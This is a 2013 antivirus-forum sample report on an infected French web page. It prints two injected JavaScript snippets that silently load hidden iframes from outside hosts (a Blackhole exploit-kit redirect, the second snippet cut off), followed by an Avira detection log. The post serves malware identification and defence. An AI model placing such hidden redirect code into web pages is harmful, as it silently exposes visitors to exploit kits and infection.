查看: 1572|回复: 0
收起左侧

[已鉴定] http://pellirojo.free.fr/

[复制链接]
fireold
发表于 2013-10-2 19:06:22 | 显示全部楼层 |阅读模式
  1. if (document.getElementsByTagName('body')[0]) {
  2.       iframer();
  3.   } else {
  4.       document.write("<iframe src='http://mscser.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5.   }
  6.   function iframer() {
  7.       var f = document.createElement('iframe');
  8.       f.setAttribute('src', 'http://mscser.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA==');
  9.       f.style.visibility = 'hidden';
  10.       f.style.position = 'absolute';
  11.       f.style.left = '0';
  12.       f.style.top = '0';
  13.       f.setAttribute('width', '10');
  14.       f.setAttribute('height', '10');
  15.       document.getElementsByTagName('body')[0].appendChild(f);
  16.   }
复制代码

  1. function zzzfff() {
  2.     var mtqe = document.createElement('iframe');

  3.     mtqe.src = 'http://papierzak.pl/rel.php';
  4.     mtqe.style.position = 'absolute';
  5.     mtqe.style.border = '0';
  6.     mtqe.style.height = '1px';
  7.     mtqe.style.width = '1px';
  8.     mtqe.style.left = '1px';
  9.     mtqe.style.top = '1px';

  10.     if (!document.getElementById('mtqe')) {
  11.         document.write('<div id=\'mtqe\'></div>');
  12.         document.getElementById('mtqe').appendChild(mtqe);
  13.     }
  14. }

  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }

  22. function GetCookie(name) {
  23.     var start = document.cookie.indexOf(name + "=");
  24.     var len = start + name.length + 1;
  25.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
  26.         return null;
  27.     }
  28.     if (start == -1) return null;
  29.     var end = document.cookie.indexOf(";", len);
  30.     if (end == -1) end = document.cookie.length;
  31.     return unescape(document.cookie.substring(len, end));
  32. }
  33. if (navigator.cookieEnabled) {
  34.     if (GetCookie('visited_uq') == 55) {} else {
  35.         SetCookie('visited_uq', '55', '1', '/');

  36.         zzzfff();
复制代码


Avira
2013/10/2 下午 07:02 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\pellirojo_free_fr[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.CZ.11' [virus]
      已採取動作:
      檔案會移動至 '540d516b.qua' 名稱底下的隔離區目錄。.

2013/10/2 下午 07:02 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        783
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/10/2 下午 07:01 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\pellirojo_free_fr[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.11 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/2 下午 07:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\pellirojo_free_fr[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.11 [virus]'
      執行的動作:拒絕存取

2013/10/2 下午 07:00 [Web Protection] 發現惡意程式碼
      從 URL "http://pellirojo.free.fr/" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.11' [virus]。
      已採取動作:已略過


av.jpg



fs.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 10:57 , Processed in 0.130058 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表